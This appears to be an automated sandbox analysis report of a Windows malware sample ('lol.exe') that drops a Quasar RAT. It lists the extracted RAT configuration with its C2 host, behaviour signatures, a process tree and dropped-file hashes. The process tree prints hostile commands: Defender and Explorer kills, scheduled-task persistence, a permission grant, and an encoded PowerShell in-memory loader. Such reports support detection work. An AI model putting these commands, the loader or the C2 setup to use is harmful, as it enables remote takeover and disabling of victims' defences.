Analysis
-
max time kernel
1199s -
max time network
1198s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
23-05-2024 15:07
General
-
Target
lol.exe
-
Size
13.1MB
-
MD5
621d4a616715d165ed2c10e48e5fd94b
-
SHA1
7fabfdb5167e59d0442df460e1b236cb5bc75fbe
-
SHA256
7975eec3959bed57e86fb6fa917503a7a1242fdf589dde7600783fc37d3dfbde
-
SHA512
793302845e76e8cc03bd8281abad4db786f361e5c1a691462b40da11e8e7ac6210e0e9c21b41493dedffc6724af146ef70b9f8448d51dc860725364e14cba442
-
SSDEEP
196608:tbVYKe7PjQhn5EQ9hNQAYzA5k6cTWDn7JKObS09Vp7j1oTeBI7lm:pzuA5EWheYkv8LlCTe2s
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
Windows security bypass 2 TTPs 5 IoCs
-
Disables RegEdit via registry modification 1 IoCs
-
.NET Reactor proctector 18 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 12 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 6 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Modifies WinLogon 2 TTPs 2 IoCs
-
AutoIT Executable 9 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 15 IoCs
-
Drops file in Program Files directory 16 IoCs
-
Drops file in Windows directory 15 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 3 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 32 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 18 IoCs
-
Suspicious use of FindShellTrayWindow 20 IoCs
-
Suspicious use of SendNotifyMessage 19 IoCs
-
Suspicious use of SetWindowsHookEx 16 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\lol.exe"C:\Users\Admin\AppData\Local\Temp\lol.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\loader.exe"C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\temp.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K main.cmd4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im WindowsDefender.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\Rover.exeRover.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\helper.vbs"5⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\spinner.gif5⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1060 CREDAT:82945 /prefetch:26⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\scary.exescary.exe5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Program Files\SubDir\Romilyaa.exe"C:\Program Files\SubDir\Romilyaa.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\the.exethe.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\ac3.exeac3.exe5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\taskkill.exetaskkill /f /im fontdrvhost5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F,M)5⤵
- Modifies file permissions
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\jaffa.exejaffa.exe5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rmmyznpyzi.exermmyznpyzi.exe6⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\eydtvbel.exeC:\Windows\system32\eydtvbel.exe7⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\xqhojspucludpui.exexqhojspucludpui.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\eydtvbel.exeeydtvbel.exe6⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\qkeukaslqxoij.exeqkeukaslqxoij.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""6⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Defense Evasion
File and Directory Permissions Modification
1Hide Artifacts
2Hidden Files and Directories
2Impair Defenses
2Disable or Modify Tools
2Modify Registry
7Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exeFilesize
512KB
MD521bdde196bb244b879aa424b7a1c9294
SHA1ad275d2854c820209f491a9f4504f150c020ac9b
SHA2564136e10b7a68d3d8c3e898eb2a5b8fb973d1c51f48ffc750b362ce8f1f5fbb36
SHA512542d54dc9c66308c3e66e616cf9ad13ca37f19a7159c97f1e3e44765c90a5ed8a2965b073da54173e419ea61792e54e80cd3b914b0f00812f1b42780084705e2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VSH5XF98\edgecompatviewlist[1].xmlFilesize
74KB
MD5d4fc49dc14f63895d997fa4940f24378
SHA13efb1437a7c5e46034147cbbc8db017c69d02c31
SHA256853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1
SHA512cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a
-
C:\Users\Admin\AppData\Local\Temp\TCD7FD3.tmp\gb.xslFilesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cteimjck.rgj.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.datFilesize
243B
MD5fc3c3eb301931edc101755bdbd07832e
SHA17de988750dc0c87064dfb06409a8963aa960f30c
SHA2567659d0f61d6acf42bf9265037ee127e8a1baede4912244bdfefdd3adb2191894
SHA512481006f15b1af0efeaf3820ab2c87cd4777749f3df91a5bac94c8f7606b2b0904a9e7b71ec371e24614b46eca84f9ed8a0863aa73411e2fba7667759a258c24d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U50EZB0S72G9BAP86AM2.tempFilesize
3KB
MD58e9803968726f83de1fe993a5796eb62
SHA1f0eacd587461c408fb96dd8b319c51fd72717fac
SHA2569285fac039479d26edbb2feec862bccde64570d29976160e12d59514af15f866
SHA512368c847330a97f78b7ecda1c59243c56a637bec00b2b7ff7f2dd89f354b6d967f0a593fd4b8ff3928da7d2467e475cbee62ff2d01b47a63e07f8147d790e76ff
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-msFilesize
3KB
MD5602d146062bd207187dab7af526871de
SHA156ac515432496ddaa939e74ea7834f134cf07f08
SHA25647d4a523ccb4cf63e3ae13c3b1517a0c72d7054bf5cc14a08bfdf5e3a9528f61
SHA5127dbd9f37abf2e8b48a5909aa51f697d130dc7ad792821e76250be4b91f0cf5ea588d73514f4dcacb2cb43d4eadce9e22965d1bcf2ce5a5f6366e6f5c097fd990
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\Rover.exeFilesize
5.1MB
MD563d052b547c66ac7678685d9f3308884
SHA1a6e42e6a86e3ff9fec137c52b1086ee140a7b242
SHA2568634e9241729f16a8c2c23d5c184384815b97026e3d1a2d6dd0ddc825b142aba
SHA512565b9243ec14dc1cf6f6ddf4a7158e208937f553367e55cd59f62f1834fcfb7d9fb387b0636dc07520f590dcd55eb5f60f34ea2279dc736f134db7b19e3aa642
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\ac3.exeFilesize
844KB
MD57ecfc8cd7455dd9998f7dad88f2a8a9d
SHA11751d9389adb1e7187afa4938a3559e58739dce6
SHA2562e67d5e7d96aec62a9dda4c0259167a44908af863c2b3af2a019723205abba9e
SHA512cb05e82b17c0f7444d1259b661f0c1e6603d8a959da7475f35078a851d528c630366916c17a37db1a2490af66e5346309177c9e31921d09e7e795492868e678d
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\helper.vbsFilesize
26B
MD57a97744bc621cf22890e2aebd10fd5c8
SHA11147c8df448fe73da6aa6c396c5c53457df87620
SHA256153fed1733e81de7f9d221a1584a78999baa93bc8697500d8923550c774ed709
SHA51289c73b73d4b52cf8e940fa2f1580fdc89f902b1eeb4b2abc17f09229a6130532a08cdb91205b9813a65cb7cd31ca020fe728b03d9a0fabb71131864c2966f967
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\jaffa.exeFilesize
512KB
MD56b1b6c081780047b333e1e9fb8e473b6
SHA18c31629bd4a4ee29b7ec1e1487fed087f5e4b1de
SHA256e649b6e4284404bfa04639b8bf06367777c48201ef27dcdc256fe59167935fac
SHA512022d40c1801fa495c9298d896221c8eefbad342d41922df8d014f2f49c3fe7fa91d603e0ee0de6be6f2143f9e0c4a6756b19260166ebd62ec3e1c64ad22bc447
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\loader.exeFilesize
5KB
MD53a66b8c04d1437b4c4da631053a76bb5
SHA1bcf8f381932d376f3f8e53c82b2b13ff31ee097b
SHA256c3aa0c8ff9e3c7e10bcd3829f3e63b4cf9c59eb4964a7576f3ef5fca50c77cdc
SHA512b24f3fb34aa293293d4f7bef247ca746608cb9ae54d214492276e7ef0fe0032944ea082f2bbf42f200359d38ed2af69f51ef5f3cb969a0ffb7176b27e0279fcf
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\main.cmdFilesize
867B
MD54eab82459d6247d5cb735bc6883a0b1f
SHA1d4e1ee562a1594b0f6a01134d9acdb36021bf8f8
SHA2564545d060ce8984205a5e1a136a523cb34c7a5df5427aeabc94bc2693b8773b2f
SHA512de3ae9666d4c681ee05a7ae7fc2c5c84e204044dc29553db2377dd3e25694ae8b5739bb56bcfa80ccc19dfff147e1b095505e092bac8ec9bcbb324988e69dc59
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\scary.exeFilesize
3.1MB
MD597cd39b10b06129cb419a72e1a1827b0
SHA1d05b2d7cfdf8b12746ffc7a59be36634852390bd
SHA2566bc108ddb31a255fdd5d1e1047dcd81bc7d7e78c96f7afa9362cecbb0a5b3dbc
SHA512266d5c0eb0264b82d703d7b5dc22c9e040da239aaca1691f7e193f5391d7bafc441aff3529e42e84421cf80a8d5fca92c2b63019c3a475080744c7f100ea0233
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\spinner.gifFilesize
44KB
MD5324f8384507560259aaa182eb0c7f94a
SHA13b86304767e541ddb32fdda2e9996d8dbeca16ed
SHA256f48c4f9c5fc87e8d7679948439544a97f1539b423860e7c7470bd9b563aceab5
SHA512cc1b61df496cfb7c51d268139c6853d05bace6f733bc13c757c87cd64a11933c3a673b97fba778e515a9ff5f8c4ea52e7091f3beda1d8452bc3f6b59382f300d
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\temp.batFilesize
16B
MD5683678b879bd775b775240fcb1cd495e
SHA110bc596b3d03e1ba328068305c8acee2745c731c
SHA25664f28aef02c7fafbc9d80735a8b1d607c3996a2ddf9ba260d4c433c002efeaba
SHA5123b2b9d231643a826183732a79489c6d2f4749ce25314c444364062c781627af59b572c082d811ae57a839cae94de77cf03eb81d99e1063e2191e884ccbaa0963
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\the.exeFilesize
764KB
MD5e45dcabc64578b3cf27c5338f26862f1
SHA11c376ec14025cabe24672620dcb941684fbd42b3
SHA256b05176b5e31e9e9f133235deb31110798097e21387d17b1def7c3e2780bbf455
SHA5125d31565fbb1e8d0effebe15edbf703b519f6eb82d1b4685661ce0efd6a25d89596a9de27c7690c7a06864ce957f8f7059c8fdee0993023d764168c3f3c1b8da9
-
C:\Users\Admin\Desktop\lol_df3e3641-3729-47fc-b829-1d6d65f5e31e\web.htmFilesize
176B
MD51fab717c517da1c27e82a93edddf9390
SHA124b6cfda27c15c1d01ba5718106c18687ed77397
SHA256bd035700f060a35c394600cabf0cf04c031927786c97cf41c55d78dddeffa11c
SHA5125452938fa310396ecacae8eab64bdae624f617e19c0d742e10e088befb686c205b8db9ccec7d9de1c9360f341db8a701d5b8c6c4eb20aaa1c2deb831ab09fab5
-
C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exeFilesize
512KB
MD58fea8a1e434d8904a12fe8ed27afd88d
SHA19791004fc2def670d40cbf4316d88121fd89d23f
SHA2561f233e07c4cfb179ebf44e09fd395fc3ac428fa42d47701c2f6f1b586477ca76
